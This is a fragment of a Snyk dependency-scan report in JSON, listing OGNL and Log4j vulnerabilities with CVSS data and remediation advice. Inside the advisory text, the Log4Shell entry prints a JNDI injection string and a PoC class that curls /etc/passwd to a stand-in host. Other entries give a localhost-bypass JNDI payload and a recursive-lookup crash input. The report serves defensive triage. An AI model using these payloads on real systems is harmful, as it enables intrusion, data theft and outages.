via unspecified vectors.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `ognl:ognl` to version 3.0.12 or higher.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)\n- [GitHub Commit](https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92)\n", - "epssDetails": { - "percentile": "0.90602", - "probability": "0.02732", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3093" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "ognl:ognl", - "proprietary": false, - "creationTime": "2017-02-22T07:28:19.659000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-02T02:16:48.918000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "ognl", - "artifactId": "ognl" - }, - "publicationTime": "2016-06-02T02:16:48.918000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:50.033229Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "ognl:ognl@3.0.6" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.28", - "ognl:ognl@3.0.13" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "ognl:ognl", - "version": "3.0.6" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", - "credit": [ - "Chen Zhaojun of Alibaba Cloud Security Team" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.15.0)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.1", - "2.12.2", - "2.15.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 10, - "functions": [ - { - "version": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.15.0)" - ], - "functionId": { - "filePath": "org/apache/logging/log4j/core/lookup/JndiLookup.java", - "className": "JndiLookup", - "functionName": "lookup" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3198", - "title": "Apache Jira Issues" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3201", - "title": "Apache Jira Issues" - }, - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/apache/logging-log4j2/pull/608", - "title": "GitHub PR" - }, - { - "url": "https://github.com/Kirill89/log4shell-vulnerable-server", - "title": "PoC" - }, - { - "url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/", - "title": "Snyk Blog and Vulnerability Breakdown" - }, - { - "url": "https://www.exploit-db.com/exploits/51183", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 10, - "modificationTime": "2024-03-11T09:48:46.605332Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:58.520882Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:43.264835Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:46.605332Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.520882Z" - } - ], - "description": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n
Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n
For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n", - "epssDetails": { - "percentile": "0.99999", - "probability": "0.97556", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-44228" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-jfh8-c2jp-5v3q" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-10T10:08:46.155884Z", - "functions_new": [ - { - "version": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.15.0)" - ], - "functionId": { - "className": "org.apache.logging.log4j.core.lookup.JndiLookup", - "functionName": "lookup" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-12-10T10:02:55Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-10T10:10:01Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:25.500242Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.12.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.7" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.16.0)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.1", - "2.12.2", - "2.16.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", - "title": "Apache Pony Mail" - }, - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Page" - }, - { - "url": "https://twitter.com/marcioalm/status/1471740771581652995", - "title": "Twitter Post" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", - "title": "Nuclei Templates" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 9, - "modificationTime": "2024-03-11T09:51:51.455756Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:56.296034Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:32.295395Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.455756Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:56.296034Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99913", - "probability": "0.97364", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-45046" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-7rjr-3q55-vv33" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-14T18:28:31.339218Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-14T18:01:28Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-14T18:44:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:25.837600Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.12.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.7" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Hideki Okamoto of Akamai Technologies" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.3)", - "[2.13.0,2.17.0)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.1", - "2.12.3", - "2.17.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", - "title": "JIRA Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:51:51.570474Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:58.516498Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:38.288854Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.570474Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.516498Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", - "epssDetails": { - "percentile": "0.99624", - "probability": "0.96524", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-45105" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-17T18:23:58.542986Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-17T18:20:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-18T07:05:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:58.516498Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.12.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.7" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0-beta7,2.3.2)", - "[2.4,2.12.4)", - "[2.13.0,2.17.1)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.2", - "2.12.4", - "2.17.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.6, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Page" - }, - { - "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", - "title": "Jira Issue" - }, - { - "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", - "title": "Openwall Mail" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 6.6, - "modificationTime": "2024-03-11T09:48:51.766965Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 6.6, - "modificationTime": "2024-03-11T09:53:58.472982Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:47.220633Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:51.766965Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.472982Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", - "epssDetails": { - "percentile": "0.89602", - "probability": "0.02239", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-44832" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-28T19:42:55.818691Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-28T19:42:53Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-28T20:17:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:58.472982Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.12.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.7" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-31409", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "credit": [ - "Marcio Almeida de Macedo" - ], - "semver": { - "vulnerable": [ - "[,2.8.2)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - "2.8.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[,2.8.2)" - ], - "functionId": { - "filePath": "org/apache/logging/log4j/core/net/server/TcpSocketServer.java", - "className": "TcpSocketServer", - "functionName": "createSerializedSocketServer" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://github.com/pimps/CVE-2017-5645", - "title": "Exploit" - }, - { - "url": "https://github.com/apache/logging-log4j2/commit/5dcc19215827db29c993d0305ee2b0d8dd05939d", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-1863", - "title": "Jira Issue" - }, - { - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5645", - "title": "NVD" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/network/cves/2017/CVE-2017-5645.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - 